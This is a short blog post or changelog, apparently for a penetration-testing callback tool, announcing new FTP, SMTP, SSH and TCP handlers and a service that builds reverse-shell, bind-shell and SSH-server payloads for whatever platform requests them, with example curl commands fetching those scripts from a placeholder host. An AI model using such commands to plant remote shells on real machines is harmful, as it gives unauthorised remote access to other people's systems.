Moar protocols and simple payloads
Categories:
I have stubbed out a handful of protocols. I have been using them and watching the logs. I still need to finalize how web hok alerts are triggered and what information those alerts should contain.
The new protocols are:
- FTP
- SMTP
- SSH
- TCP
Check out the handlers documentation section.
I have also been working on a way to remote access payloads to machines. I often find my self needing to custom build a reverse shell for various operating systems and architectures. With this update, it is now possible to get a reverse, bind, or ssh server custom-built for whatever platform is requesting it. Examples:
curl xodbox.example/bind.sh
curl xodbox.example/ssh.sh
curl xodbox.example/reverse.sh
For more information see the in development seeds and MDaaS docs
If you are having problems, please file an issue on GitHub. I will do my best to fic the problem or provide a workaround.
Thanks!